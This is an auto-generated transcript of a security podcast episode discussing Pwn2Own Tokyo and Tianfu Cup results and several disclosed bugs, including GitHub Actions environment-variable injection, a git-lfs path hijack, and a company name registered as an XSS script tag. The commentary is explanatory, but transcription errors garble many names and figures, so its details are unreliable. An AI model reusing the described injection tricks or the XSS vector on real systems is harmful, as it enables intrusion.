Episode 52 - Pwn2Own, Tianfu Cup, and Other Hacks
< Back to post
This transcript is automatically generated, there will be mistakes
Hello everyone. Welcome to another episode of the day Zero podcast. I'm Specter with me is zi today. We'll get into some news around some of the pone events that have been happening over the last week as well as a mixed bag of our CES before we get into that though. I will quickly show it discussion video will be dropping this week on Thursday at 8:00 a.m. Eastern. We have a guest on it withdrew G who some of you who are in our Discord may know he's a moderator of our Discord which you can also check out we have a link in the YouTube descriptions as well as in twitch. But the videos about life in the security industry and the types of jobs that are available there. So yeah, make sure to check that out when it drops on Thursday with that said let's talk about pain Dome. So poem to own WD Cloud addition or sorry Tokyo took place last week. It was a 3D three-day event hosted live from Toronto. So you can notice with the name. It's a little bit weird. It spoke phone Tokyo Live from Toronto and that's obviously because of the crazy covid stuff they Host the event actually in Tokyo this year as usual when covering poem to own will cover some of the targets hit we won't cover all of them and then we'll cover some of the final results and thoughts. So on day one, there were a few teams Star Labs targeted. The Netgear Nighthawk are 7800 routers. They managed to gain code execution on the Lan interface trap, uh security and 84 c0 targeted the Western Digital My Cloud Pro Series. And there was some Collision on that 84 c0 got no points because it was already previously reported and the Yentl cybersecurity team targeted the Q 6t T Samsung TV, but they used a known bug on the second day. There was even more collision with the w the WD My Cloud Pro which is why I kind of work that into the way I introduced it. There was team bug scale had collision with WD My Cloud Pro f-secure Labs. Also hit the Q 6t T as well as the metal. Um, and they also used a known bug there might have been a collision there, but they don't say that it was previously reported in Poland own. So it might have just been a different known bug and then another researcher Sam Thomas. Also targeted WD My Cloud Pro on the third and final day Dev core targeted the my club pro as well using six different bugs to of its were already used in bone to bone. So that that resulted in five collisions on the WD My Cloud Pro. And then finally Star Labs popped up the Synology diskstation knots with a race condition. So in terms of results team flashback one with four Master upon points Deb Court came second with three and a half and trap became third with three overall. They were awarded $137,000 roughly 423 unique bugs. There were a lot of partials this year. I think in total the counts were eight successes nine partials and two failures.
the thing with tone to own I thought it was kind of disappointing and in the terms that all of these targets were iot. They were they were kind of soft Targets in my opinion poem to own Tokyo for those who have been familiar postponed own in the past. It used to be pwned to own mobile. So, you know hitting iPhone and Android and stuff like that yet in this competition. There were no phones hit no browsers hit no operating system set. Nothing like that. It was all like like TVs and routers.
This is basically like was it point? I want to say poem tone Miami last year was their iot one. So it might just be that they're kind of rotating it around them or maybe you know, Tokyo is always going to be like this but I mean, it's not like poem tone hasn't done. And iot one before yeah, they're all iot somewhat of an easier Target that said I mean the companies getting involved here are at least make an attempt at securing their iot devices.
Yeah, it was just it was a little bit disappointing in terms of targets because they do still feel like soft targets. Now, the the other thing that I found interesting was fluoro acetate didn't compete in this event and why that's notable is in the previous pwned own events. We've covered the duo Richard. I forget the other person's name, but there's basically a
Duo I don't believe they competed in the other iot one last iot Poteau
neither. Okay, I know they did participate in one we covered this year. But anyway, yeah, we
cover mobile and
like browser. Yeah, but when they participate they absolutely dominate they just they take first place in everything and with with their lack of participation in this event, the results were a lot closer. So, you know, there was a little bit more competition there at least but it also seems like there was a lot more. More Collision this year than years past probably because of those softer targets potentially, you know easier bugs easier to find more valuable to report than harder to find one's feel like it might be in zi zi interest to limit Target selection down more for future events or just have like one iot event in the year or something because I really like had like no interest in following this event as I saw the target's coming out. I don't know how you feel about that like idea of it could just be because Wanda own Chinese teams aren't allowed to compete in poem to own anymore. And it seems since that's been the case. It's now teams just thinking what's the softest Target I can hit with the least amount of effort to try to squeeze out like 5K or something and if pode own events continue with these less interesting targets. I might just stop paying attention to them. Really. Maybe I'll check out the results at the end. But like I used to follow pwned own results live because I found them so interesting and I just I just didn't really care much honestly this time around.
I mean I can to some extent I can agree but at the same time I think this is more an example of just home to own growing. So now they're not only you know browsers not only some phones like they've continued to grow and her having, you know other Industries interest in actually participating. In that and you know allowing their devices to be attacked in this sort of competition highlighting their own vulnerability so they can get that information paying out on them. I think it's just an example. They're growing some people have different interests and we have There's still going to be the poem to own where they're covering the browsers where they're covering some harder top targets.
Well, that's the thing though. This was supposed to be that at that if you look at the announcement for poem to own Tokyo, they even say right in the announcement that the the big focus on it is phones and they list the phones that are like that are allowed targets like the the Android phones and stuff like that and also the iPhone 11 if I remember correctly. It's just that none of the teams. Wanted to hit that
because which can I find kind of interesting that they're not hitting the phones? So am I thought this was there? I just assumed given what was being hit this was that iot. Hold her own similar. I think it was Miami. I might be mistaken about that. I know but pain down at has had a like iot one before so I just thought that was this if they announced this as being something other than that or having all the phones involved in teams are choosing not to that. That is actually I think were worth a bit more for discussion. I did notice that I didn't look at how this one was actually announced you happen to have the link for
that. Yeah. I do all actually bring it up on screen now. So in the announcement thread you can see they have the target handset so they have the pixel for the Galaxy S 25 111 Huawei P40 and that they also have the smart Tech right like the wearables and the the televisions and routers but those were kind of the secondary targets. It seemed like they had the phones on the top. That's what they wanted people to Target. It just seems like teams didn't want to put all the effort in because obviously hitting those phones is harder than hitting these little dinky iot devices, right and that's what I think happened was just the team's didn't have any interest in hitting those handheld devices. Because it was just I guess more effort for what you could potentially like. If you're just going for the master of pain points and winning poem to home then it's probably more worth it to just hit the easier targets to try to rack up more points and hitting a big Target. But yeah like that makes the event a little bit less interesting for me and and feels like The target was kind of missed on what pwned own wanted. You know,
what point own wanted. I think what you know, essentially the viewers of poet own if you want to call it that when it's I guess this time they did train but it's not exactly a spectator friendly sport or anything like that. It's not like watching races but one of the interesting things about Point own has been seeing, you know, those harder exploits coming out of it. Yeah zi like I agree. It's definitely disappointing. Going to see teams were going for that. There could be multiple reasons behind that perhaps. It's just things were going forward and then find vulnerabilities. I find that somewhat unlikely. Yeah, it's a possibility. I do find it somewhat unlikely that that's the case given past performance. Like I can't imagine,
you know, it's now suddenly nobody's able to find anything.
It could be the value of these exploits has gone off on like the gray Market.
I think that's a more likely factor is the fact that people don't want to burn these bugs at poem to own and the values increased
at the same time. You do have companies like f-secure. error they kind of make their money off of having that research coming out Sapone tones a good place to kind of be able to do that research still get some money get the I guess notoriety for it. While still kind of staying on the disclosure side of things rather than selling off to the gray market. So there are incentives for companies to do that. Like the research teams to still do that who are going to be selling off or just the companies that have wouldn't be selling off to the gray Market the like it makes more sense for talking about the individual participants rather than those that do have like company
backing. Yeah, obviously we can only speculate I could also see this event being disappointing from a company standpoint like Enterprise because I think I've talked about it before but companies do use poem to own as a as a metric or window to see how they're doing in terms of this is their security stance. So if they get popped at pone to own they know okay, this is we need to improve on this area wherever the bug might have been found or something like that. There's definitely useful insights that companies get Besides just to bug reports but obviously where they didn't hit those phones Google and Samsung and Apple and these companies aren't going to be getting those insights because there's nothing to be had there so I can see it being disappointed for this pointing from their perspective as well. What I think was a much more interesting event though and where people had their attention focused was the TN Foo cup, which is the Chinese base event, which is where some of those teams that use to participate in Poland own had to move to so Tian fuzhen. Also took place last week it started on November 6th. And I think it was also a three-day event fire member or might have been a two-day been actually looking at the Twitter that you pulled up but some of the targets that were hit were very big targets iOS 40 non-iphone 11pro the Galaxy S. 20 Windows 10 was even hit version 2004, which was I think the August update Ubuntu Chrome Safari Firefox Docker even VMware and QAM. You were hit so the virtualization stuff was it as well? Well, so a lot of interesting targets were hit the winning team from last year came around to win again, which was the Kyoto 360 they came home with seven hundred and forty-four thousand dollars out of the 1.2 million dollar prize school. So the prize pool here is also a lot larger than boat. Owned it Financial Lightyear security lab came second. What a name by the way and Ace independent security researcher. It seems name Peng came in third. This target list kind of blows poem to own out of the water and terms of everyday devices that people use and many interesting targets and exploits will probably will be coming out of this now technical details aren't known for most of the findings many of them probably haven't even had fixes shipped yet for them. So those will probably come in like the days and weeks we might see some write ups or something after they've been patched we can only guess on that though people might have to go commit surfing to find at the actual bugs that were fixed, but there's definitely people with their eyes peeled here to see if there's zero days got burned because of that Target list, you know when you see those targets, yep
to know if Like what involvement the companies have with the TN food
cup? That I'm not sure on the Tian fruit cup I know less about on the logistics side of things.
Yeah, I mean Being in G zi zi this world. We can't really read it.
Yeah, like even the results for it is hard to read. We had to go off translations for some of the top teams. Yeah. I mean zi I think is a little bit more transparent when it comes to how they how they interact with vendors. Like I don't know. It's a little bit weird right now with the with covid but before covid the vendors were on site at the EDI to you know, talk to the researchers and get information about the issues to fix them. I don't know if that's the same situation with Tian food cup. I imagine the vendors still have some kind of communication Channel, but I don't know if they have that same kind of interaction with the researchers directly that could be an interesting. Like if somebody listening knows that definitely like leave a comment about that because I'd be interested to hear about that. But yeah the answer your question like I'm not totally sure how that process. It's works, logistically. But what I think this competition goes to show is just how much these Chinese teams are are just killing it in the bug competition space when they got banned from going to poem to own this event kind of became the new top event to look for in terms of gray market for looking to see if 0 days are getting burned and probably for vendors to with what I was saying with bone to own with getting some insights into where they might want to address potential issues in the code base and stuff like that. So yeah, tan fruit cup was was a lot more interesting than po known in my opinion. And I'm I hope we'll be able to get to see some of the bugs and exploits that came out of it.
It would be nice to see them but being Chinese teams, I can also imagine we'll get Chinese
write-ups. Yeah, I mean translate will be able to help although Chinese is difficult to translate from automatically. So we'll see how I've done some
translated write-ups like that a lot gets
lost. Yeah. Yeah. It's weird the language barrier between English and some of the Asian languages like Japanese and Chinese are a lot greater than let's say like English and French for example, but yeah, hopefully we'll still get to see some details. So we'll move into some exploits. This one is an old issue that only recently got posted about due to fear of retaliation. So, you know, it's an interesting story into the gate. It's it's a bug that allows you to get unlimited Chase Ultimate Reward Points. So there's not many technical details here. This story is a bit more political or drama in a sense the researcher discovered the issue in November of 2016 and the researcher discovered that when they transferred balances between accounts for the Unlimited Chase Ultimate reward points on the Chase Bank site when they did that on an unstable internet connection a double transfer would occur. So if you transferred from one account to the other one account, when end up with double the amount of the transfer and the other account would get double the amount deducted so it would go to like a negative Point count. For example, if if the point count was low enough and we've talked about some similar types of issues in the past usually induced by race conditions.
Yeah. This one is a little bit Interesting on that part though because they do say it's when they have an unstable internet connection. So like often with race conditions, you're sending multiple requests kind of rapid fire. But if you're having an unstable connection more likely things are being dropped. So then yeah I think of is like your retransmission, but that's you know done TCP level like no servers should be seeing that as like to actual separate request. So unless something else was causing it like okay request. Failed therefore try it again, which doesn't seem to be the likely case here. So I do find it interesting that the unstable connection that resulted in this.
Yeah. It's similar in the end result to what we've seen with race conditions in the past. But like you said, it's it's the unstable internet connection is weird. I wish we got a little bit more technical details on that aspect. But yeah, like I said, it mostly goes into the more of the political side of it. So since this, Was tied to a bank Chase. They didn't want to tread any Dangerous Ground. So initially in 2016, they tried to report the issue through Twitter because at the time Chase didn't have a bounty program, they responded and gave him permission to test and when he did the POC it actually works. So well that he essentially manage to create five million Reward Points which was equivalent to 70 thousand US dollars. So this is an insanely impactful issue from a financial standpoint. And then the researcher took it further to test these points can actually be withdrawn which was possible. So after they wrote that POC and confirm the points could actually be used and financially damaging. They sent all that information over to Chase and Chase initially stated that they'd fix the issue and it seemed to be going well in terms of the interaction then a week later. They got an email saying they can't disclose the information. He said he can't disclose it because it was so hostile Yeah, apparently you got a hostile message like a week later and years later. They sent an email stating they were closing all of their investment and banking accounts associated with them including five credit cards. He had with them for years. So yes, like they took it in stride. I'm sorry. I want to jump back
a little bit when it came to kind of the process here and the disclosure process. He did get permission before he tried to actually claim those points. Yeah, like he did go back. He had first see permission to do like some testing but then they also want to make clear that but before he actually tried to use those illegitimately gained points. He did also kind of get further permission from Chase to do that or at least he believes he did some of that does come out from the Reddit thread were the author was talking about this. I just wanted to kind of point out that on the disclosure side like he did take I'd argue a lot of the right steps towards doing this disclosure, especially since I didn't have a disclosure program in place.
Yeah, I think so as well
his accounts now have been deleted as you're saying it's unclear if it's related to this or not. He seems pretty certain that it is related to this. Although, you know, it's been four years and Don't lie. Now just be taking
kind of a punishment
against it does seem a little bit little bit on the strange side, but he hasn't provided any other reason and I can't expect Chase to provide any
reason. Yeah, I mean it's worth noting that this should be taken with a bit of a grain of salt because this is only one side of the two-sided story. Obviously. Yeah and like you were saying like happening years later does seem weird at the same time Banks usually don't just terminate your accounts out of nowhere and if there's nothing else that he did that would warrant that termination. It seems likely that it would be connected to that initial report, especially if they did react hostilely towards it initially. Obviously, we don't know all the details but banks are kind of known for being vindictive when it comes to breaking their stuff. Now, I will say for something this financially damaging. I think it might have been in the best interests of the researcher to ask for a more legally binding permission to test this something maybe something with a signature instead of just a Twitter DM. I don't know how you think about that because like a Twitter DM from their account is technically written permission. I just feel like if it ever went to like a quart or something. It could easily be challenged like or Twitter account was hacked or something stupid like that. Whereas with a signature it's a lot harder to claim something like
that. If their Twitter accounts were hacked. It would still be the case that he was operating under the belief that he had permission to do so. And that that intent not to commit a crime like even though it's false like that does matter. No, because he's taken some steps that due diligence towards ensuring that he was acting appropriately. Oh again always have to preface this stuff by indicating like I'm not a lawyer but in my understanding like that intent does matter so we kind of had this come off when we were talking about the stupid pen testers who got arrested the physical assessment gain smoke the state state buildings, like they believed that they had permission to be doing their assessments that they weren't charged with. They weren't charged with anything actually relate to that. It was some it was downgraded to something. I can't remember what the crime they actually got. I think honestly
they were going to charge him with be any but then they downgraded the trespassing or something.
These stories are trespassing. Yeah, we'd have to go look back at the actual report on it. But it will God downgraded largely because like they were operating with the belief that they were forming a legal work. Which does change kind of how the blame comes obviously the person giving permission who shouldn't have kind of get some of the blame in that case. It doesn't just fall on the pen tester who had reason to believe that they were operating illegally. I'm in this case. It is worth also noting like the sky isn't a pen tester. He said developer. So not really coming out from that same perspective. I think it's fair like if you can like get more permission than just a Twitter DM. Though at the same time. I'd argue. It's at least sufficient for some things like If This Were say like a SQL injection that was going to dump data. Obviously you you probably want more especially when it comes to baking information. You're probably going to want a lot more information or a lot more solid of a permission structure in place something like this where basically just generating points out of thin air.
Again, it's getting a better financially, but it's not hitting other people's data or anything or their accounts.
Yeah, and it's something that should be easily rectified on their side like by removing it. It's not an actual breach of data. Yeah. I don't know. I've I think it's definitely a fair question to ask and I don't know where I would draw the line. I don't feel like this guy operated poorly though. Like I don't think He absolutely like should have gone further on it. I think going further would be a good idea in terms of information, but I don't think like what he did was wrong.
Yeah, exactly. I don't think this excuses the parent behavior of Chase here. Obviously, I will close out here by saying though. We don't know all the details. Obviously. We only have the the blog post and the author's comments on Reddit that zi dug up. To be able to comment on so there could be more to the story that we just don't know about and it actually seems like that is kind of likely because there are some weird aspects of the story like that many years later termination of the account. So
yeah, the termination seems like there's definitely more to this that we're just not hearing that said, we're not going to hear from Chase like I wouldn't expect a company like Chase to Issue a statement regarding somebody's personal account and why it was closed.
Yeah, no, no chance. So yeah, we can move on from that. So we have a GitHub issue reported by Google project zero. So this is the again Hub actions. For those of you don't know GitHub actions facilitates continuous integration and how that is done is via workflows and commands that are inside of them. So how GitHub processes those workflow files. Is there actually processed by parsing STD out of the executed actions to look for command markers? So in V2 that's the double colon and be one double hash tag, and one of the commands that they support inside workflows is the ability to set environment variables which seems somewhat reasonable because environment variables are used in build scripts and stuff pretty frequently but as the report author points out there is a susceptibility for injection here if an attacker can influence. STD owed at all because they can then just inject commands into it that we get parse. So if any untrusted data can get a test video one can set the environment variables for example to achieve remote code execution. Usually as soon as another workflow is executed. So one example, they give is the vs code repository. So they have a workflow for newly-opened issues and the purpose of that workflow is to copy issues and other repositories and the issue title is printed into the sco. Umm, which can then be used for command injection. So you can use the you can open an issue on the repository create a title that would override environment variables via that command that I talked about earlier and one example, they give is overwriting the node options environment variable which allows them to set an experimental odor that will execute a potentially malicious payload. So the biggest issue with this vulnerability is it's not just a bug or like a technical oversight. It's an inherent design flaw with how they parse commands out of STD out and inherently seem to trust the output of that stream for whatever
reason it's a design choice for sure that they've decided like they wanted to support adding environments and to be fair. This isn't like arbitrary command injection. There are specific commands that are supported here such as Specter Assange said environment or said e&v. The other one that's you that could be used for something. X White's is ADD path. Which of course adds? That's a good one add something to the path of. That's going to be looking up. So you've got those two as the main ones pointed out. It is also worth mentioning and this matters. I believe for the vs code one is that you can only do kind of one injection at time in the vs. Cold Case. That's because some of these cases will Our sorry inversion in version one you can kind of have commands in line. I believe. Yes. It's a version one commands were kind of in line. You just do the double hash tag and then all the command information version to you do the double colon, but it has the double colon has to be at the start of the line. And actually I guess I am mistaken for the vs code. It looks like you could possibly do multiple since they're using version one, but I believe You call out a one case where they Ward able to get an exploit as easily because of that requirement that it be at the start of a line. Yeah,
so because of the fact that it's an inherent design flaw the author even stated. I'm not really sure of the best way to address this issue the state of the good long-term fix would be to move workflow commands to some out of bound channel to avoid parsing STD out. So opening like a different file descriptor, but they they know that would break existing code. So it's not really the best solution either and because this issue is so difficult. You can see in the timeline this issue still. This it has been address. They reported the issue to get Hub on July 21st on October 1st. GitHub issued an advisory deprecating the vulnerable commands assuming assumedly the command to set environment variables. They weren't really totally clear there and then GitHub requested an additional 14 day grace period on October 16th on top of the 90 day one that was already issued and then on November 1st, they said they won't be disabling the commands by the time of disclosure. They wanted another 48 hours to notify customers and determine a hard date for disabling the commands mentioned but project zero basically stated they already granted one extension. They're not going to Grant another one. So disclosure would still happen on the second. And so it did.
Yeah, which I think is fair like they say they did already offer an extension they had their grace period they had 90 days beforehand to do that. It does sound like there's a communication issue where they didn't get any response. I don't think project zero is Type of team that usually just gets ignored. Yeah, it wasn't optional. Yes, so I mean I'd say, you know, there's a chance of like, you know, somebody just kind of left and was no longer monitoring the email or something. Obviously. I have no idea what would have happened there. Just I doubt they were intentionally being ignored on that. So kind of sucks forget Hub. But yeah, they had their time to kind of deal with it.
Yeah, I mean, I don't think project zero has ever granted more than one extension. I think we've covered some issues before where people were unhappy with project zero for not extending but I don't think they want to set that precedent that they can be pushed around to extend deadlines more than once which
we talked about the changes to their disclosure policy. I think at the beginning of this year and made some changes. We're like the 90 days just became the default. They weren't going to release him early and it was To be a lot harder in terms of the extensions. So this is just evidence that they're basically keeping exactly what they say that and I mean I have no I had no reason to think they
wouldn't yes sticking to their guns. This is a potentially massive sweeping issue that could be abused which is why even though we're just talking about how Google is sticking to what they've said, I feel like this is one case where extending the disclosure deadline might have made more sense. Just because it can affect so many projects. It's not an issue that just affects one vendor. It can affect like any vendor that uses GitHub actions on their public repositories. So
so it impacts like it impacts a lot of projects but it's one platform that's impacted like GitHub could in theory centrally fix this
It would just piss off a lot of people how
to fix it is kind of a different question. You kind of mentioned that they've now deprecated it or and will be disabled in the near future. I think another thing would be whitelisting early on setting a white list of environment variables that can be set might be another option. They had that's added to the beginning that would be some that you can kind of roll out in the sense out of it won't break old code if it has no wifeless maybe. Vaults open for a while, and then eventually just doesn't work until you set here whitelist. That might not work for everybody if you need like wildcards, but I do think some sort of listing in there. Would it be a better wait at least a deal with the environment variables? I'm not sure about dealing with ADD path. But I do I feel like there are ways that they could have gone about this without just deprecating it but it is a difficult thing to solve because like obviously they intended these commands to be used and to have value. The only other thing I think of is maybe including some sort of token with it to kind of indicate its Integrity. It's just you can't really hard code that but it needs to be something the all the process could involve can know. Maybe like some sort of signed signed value. I don't know. I'm just kind of tossing out a few ideas on that. It's definitely an interesting problem though because it is a feature that is useful and removing. It does seem a little bit
extreme. Yeah, yeah, it's an almost impossible to solve issue without just disabling it outright. But that being said like like I said, I do think extending to the Scotia deadline by the made sense at the same time that two month Gap or so in the timeline seems like a lot of time that was potentially wasted on GitHub side. Like they were really late on deprecating those issues like they deprecated them in October and it was you know reported in July, so Is there is a gap there that probably should have been filled quicker that way the deprecation had a longer time window before they could disable them and they could have potentially disabled it before this report even went public so seems like a bit of a mess
there. Yeah, for sure. I mean, that's absolutely on GitHub. I don't know what the communication issue was. But that is definitely on GitHub and they should have been a bit more on top of that. But we also don't know what caused that. So it's hard to really really come down and try and blame. I'm them GitHub doesn't seem like the type of company that's just regularly going to exclude or have issues. Although now that I'm thinking about it one of our last episodes then we have another issue where GitHub was kind of slow to respond.
I can't remember. We've covered quite a few GitHub issues
lately. Yeah, just lately cuz we were mostly covering get lab for a
while. Yeah last last like three or four episodes. We've probably covered like maybe like for GitHub issues. It's been pretty crazy. I don't know why there's such a sudden focus on them. But yeah, there
is no my like there's definitely been some some interesting vulnerabilities coming out
although I'm just quickly locked and I'm not seeing any case where GitHub wasn't fairly responsive just quickly looking at my notes. So I might be thinking of somebody else with
that. Yeah, yeah, nothing comes to mind for me. Either that said we'll move on to Apple. So Apple put out a security notice about iOS 14.2 and iPad OS 14.2. This was a basically a batch of security fixes. There. Were you can see like they have a bullet point style of all the issues that were addressed a few audio issues and font parsing issues that were addressed some kernel memory Corruptions. What was notable about this advisory though was let me just find exactly where it was Project zero found a few of these issues. I think they found a font parsing issue in a kernel issue and they discovered that those were being exploited in the wild. They even say in the the impact their apple is aware of reports that an exploit for this issue exist in the wild and it looks like it's a full chain, which usually when you look at full chain for something as big of a Target as iOS, it's Probably nation-state. So yeah might be a good idea to update your iPhone's because it's not every day. You see the in the wild issues exploited especially in Apple's case. Usually those exploits are very valuable because apple is so locked down when it comes to sandboxing and stuff. So the fact that there's an unsent or a Sandbox reachable issue that can then be escalated the colonel. Yeah, you probably want to
update. So yeah, I think it's also worth mentioning here that with those Shane Huntley. So I believe they are the there the director of the threat analysis group of Google did mention that these three they are they also had that same they're not related to any election targeting in the reporting by ZDNet. They specifically say that Shane, huh? Make sure that these are related to the recent set of three exploit our recent Chrome zero day. So we covered last time. that's said they link to this tweet and this tweet does not say that so there might be another source for that or it might just be misunderstanding what's being said here and that it's similar to other recently reported o days, which I do think is kind of an interesting aspect, especially if it is relate to those Chromo days like being XY in the same
campaign What would be weird though is when you're talking about iPhone Chrome is Chrome has more of an Android thing right Chrome has yeah. Well fine Android and iPhone iPhone
Yeah, exactly. And even the Chrome application on iOS uses webkit in the back end. I think it doesn't use like Crohn's typical back end with V8 and whatnot. At least that was what I remember hearing a little while back. I don't know if that's changed or not. But those factors does make it seem unlikely that it would be chained with the Chrome one. It would not be possible that you saw the to and connect with them
not necessarily trained. So being part of the same campaign doesn't mean they're being chained together because that there are Target's that they're hanging like it's the same group using these kind of at the same time. Like if somebody has Android device they're causing with the Chrome one. If somebody's using iPhone they're costing out the iOS device. That's all I mean by the relationship in the campaign being there her possibly being there not so much that you would chain 3 promo. Days with that because you're saying that's not really going to work out just because iOS basically it's all web cat out of chat. There is a curious who says unless you want to rule your iPhone then don't update. I will say you might also not want anybody else the row here iPhone for
you. Well the cool thing about some jailbreaks though is they will use those bugs and entry points and then post jailbreak, they'll actually like monkey patch them out, which is really cool. So you could potentially use this issue and still be safe from the underlying bugs, but that's neither here nor there.
Well, I mean it is kind of interesting discussion. I mean when you have your phone rude and you are opening yourself up to actress you might want to ruin it. Like there's absolutely valid reasons to That and use a rooted phone. So by all means like yeah, you're welcome to but just if you want to be more scary, I think part of the argument would have to come down to keeping things updated rather than routing. Although there is probably an argument to be had on the other side there that you can definitely do some more you can Implement some of your own security. If you were to root your device both. The users probably aren't doing
machine. So actually can you do that to like delete messages? It seems like this is only really intended to be more of a display thing. If you notice this is under the layout and custom scripts area. It seems unintended that you're able to turn on node integration. For example set this up as a preload script since the fix for that effectively disables that bye. By only using the features argument basically if you're on a jitsi
domain. Okay. Yeah, I skipped over the fact that it was in the the layout section so okay fair enough. So yeah
that I don't think that's
yeah since I mean the fix basically ended up being that one line being added just emptied out the features unless you're going down. the more trust that path
basically Yeah. So get lfs mortgage issues. So get large file storage also had an RC e published last week. So get lfs has an extension for versioning large files. So it'll take large files that would typically bloat a repository so like videos or binaries or whatever and it replaces them with text pointers inside of get while storing the file content on a remote server. So it's potentially very useful extension. The problem is they don't Supply a full path to the get Binary when executing a new get process. So again, it's a classic. Hijack due to an incomplete path. We've covered many such issues on the show before so by placing a malicious get executable in the main repos directory, you can get that executable directed on a executed on a victim machine instead of the real get executable. So like the title suggests. This is technically an RC e that being said, you would need the ability to push the malicious file into the main repo. So the impact isn't as hi as you might immediately think if you just read the title, but yeah still though still
isn't rce. Do not exploit this say with somebody cloning and then working on the repo perhaps
Like a fork.
Well, yeah, I fork would be another option too. But if somebody just cloned your repo and then like did local work on it didn't necessarily push it well. Yeah, I'm just trying to think about what the attack vectors would
be. Yeah, that's the thing. Like well, it is remote. It's one of those cases where the circumstances make it. So this is almost like a self attack unless you have control over that repository. So yeah, it's not as serious but it is it's still a still an issue and the issue was patched in version 2.1 2.1 interestingly. There was some Collision on this issue as well blades infosec also found the same issue and did a write-up on it. Apparently they were the first to report. To get Hub through hacker one, but they weren't the first to find the issue. But anyway there is that separate bright up for anyone that's interested. I do think this write-up might be a little bit cleaner and easier to follow than the pure text one that's provided by legal hackers. I must say the second one Banger of a name is a Star Wars fan. It's called attack of the Clones get clients remote code execution as a Star Wars fan. I really do appreciate that title. But yeah, so Blaze infosec collected the bounty. From github's hacker one program and then legal hackers ended up getting the the CDE.
And I will just kind of mention going back on legal hackers that feels like such a bad name like gave a few have to point out the fact that you are a legal hacker. It just feels like a we are named like I mean, it's completely unrelated it. Just yeah, it seems like that fishy name of being you know legal hackers and it also seems like the type of thing that you would get a home off like YouTube comments before something like, you know, you know, thank you so much name. I found a great hacker at legal hackers.com I mean, it's completely unrelated to the issue the legitimate issue. I'm not trying to throw any shade there. I just find the name a little bit
humorous. Yeah, Brandon could have been done a little bit better there. So move on to your LS though. This was a an issue that was multiple stored cross-site scripting vulnerabilities in the admin panel for your LS. Essentially. It seems they provide a hooking functionality that allows you to replace code with code you control they call it like a filter. So if I just scroll down here to the code you are a less add filter shunt is valid user and then you can replace that with an exploit payload and the researcher States you can use that to perform. Xs/s. This issue is I mean, okay. So you need to be able to have administrative access to be able to edit PHP code to be able to exploit this issue. I I'm trying to see where this would actually be useful to attack somebody with yes. I suppose the scenario here is our Rogue
admin. That's basically the only case sameen you're not getting like usually with cross-site scripting you're going to want like kind of a privilege as escalation of sorts you find a page that you can get excess on that somebody with more privileges can access or be infected by the cross-site scripting this case. It's an admin user. So you already have all the permissions you have permissions to add code. so I guess to be fair, I will mention here that the Part of the cross-site scripting does come because of the comments at the top here this plug-in name plugging URL description version author. All of those are worthy cross-site scripting actually comes in those get parse and then displayed when you list all of your plugins, so it has to be an admin installing a malicious plug-ins. So you could write a plug-in that would seem legitimate that also did the cross site scripting it would it would potentially be other people installing it to like there is that Avenue of attack? Like I don't think the plug-in name should be vulnerable here at all. But they're just showing like it's possible for the plugins to be. Abused but this cross-site scripting does come out with like the name and stuff. It's not like the payload here is just you can cause code to run. So this is if you want to back door with have a back door plug, which is kind of a given if you're going to have a plug-in at all like they can be back to work.
Yeah, you don't want to be installing untrusted plugins. Typically not a good.
I mean you people generally do but yeah, he generally don't want to but most people aren't going to Do a code audit of every plug-in they plan to it was unfortunately.
So I'm not saying that this isn't an issue. I think it is an issue. I do take a little bit. I looked at the cve because I was curious because they have the severity on their report listed as I think they have it as severe right? Is it trying to find where they have that but anyway in the CBE the CBS s score has the Privileges required as low I don't fully agree with that assessment. You do need admin capability and that is pretty much like the maximum. Bubble of privileges you can have like you were saying this is more of a backdoor attack. It's not a privilege escalation. So well, the thing is acquired has a little bit of a weird rating for me that they put it to medium
Revenue generally don't and most people aren't writing their own plugins. This is going to be like a plug-in written by a remote attacker who he then install it from so while the attack is being the admin to actually do the installation. The plug-in like in most cases people aren't the author of their own plug and they're probably not writing it and intending to have a back door their application. That's where I kind of. I kind of draw the line there as being like okay, I could understand where you're saying. It's a unauthenticated Tacker because the codes probably being written by somebody completely removed from the actual process like from the administrative privileges.
Yeah, you kind of see that. Although at the same time if that's happening. They can run PHP code which is already more of an issue than what this attack is. Oh, yeah,
for sure. Like this is a case of like just installing malicious code.
Yeah. So like I
it's just a case of trusting what you're running or not trusting what you're
running. Yeah, but this is another issue where yes it's an issue and it should be fixing. It seems like it was fixed since they limit a Max version for the for what the bug can hit but pretty pretty low impact at least in my opinion. So so we'll get into a fun story. This was a fun story from a British software engineer that decided to start a company and file the name as a xss specter. They had quote and tag start tag script Source equals and JT dot excess of HT closing bracket and then another quote so basically making his company name a Nexus S vector and this is further than I think I've ever seen anyone go when it comes to trying to exploit an xss. Although they do mention there were some previous attempts that just never really got public attention. There was apparently an SQL injection one as well. That was based on that XKCD meme of I think it was like Timmy drop tables for his quality tables Bobby take yeah, that's what it
was. There has been I mean the SQL injection ones. I always find a little bit less. Well, they are significantly less likely to work just because you need to know like the proper table name to actually try and drop you need to have a go where it's splitting on the semicolons and can run stacked queer or can run stacked queries, which is just not terribly likely for many cases. Whereas the cross-site scripting obviously did work and can
work. If more practical yeah,
yeah. Well, you need to know a lot less you just think hope it's being injected like if you get if you get that double quote in there, it's basically going to work. If you don't it's not going to work like there could be more complicated scenarios. But for the most part it's a lot easier to get a hit. Yeah,
so like you said this can and did work and it actually caused so many issues that they forced him to change the company name the company name had to change to that company whose name used to contain HTML script tags LTD. So yeah, they said a company was registered using characters that could have presented a security risk to a small number of customers. So that's that's why they made him change the name. So kind of a funny story Justin. Another one of those cases where it's something. You probably don't really think of you don't really think of a company name being a potentially malicious attack Vector. But as this person showed it is one and while it is pretty far to go to exploit an issue. It is a potential route to go. So, yeah, I guess he just wanted to do it as kind of a drawing drawing a red flag to that and saying company should be considering this in there and their threat model, I guess.
Yeah. I mean, it's a row. Out to go. It is also even with cross-site scripting what could they have done on this page? You know installing malware has both the only Ralph that he'd get to go. I'm not sure there's necessarily like an admin area that are something that they have been able to use like there is definitely a bit of a limited risk there, although You saying? Using this to install malware, you know would be completely Fair like it is an issue
still. It could be hard to do though because I could see there being limits on the payload, right? I don't know all the restrictions on company name filings, especially in well, but
the thing is like in this case they just do a remote source, so they can put any code they want in that MJ T dot excess that HT. Yeah. Well your code goes there. This is the completely cross site scripting you need for arbitrary
injection. Yeah, so malware drive-by is a still a very real type of attack that could be done using this
Yak to be fair. That's some of that coping down with the last one,
too. Yeah, continuing on our excess strain. We have a Facebook dom-based xss using post message. So I'll let you take this one over zi because we do love Facebook here. But I this this issue was a little bit confusing to me. So I think you might be able to help clarify some of the some of the weirdness of this
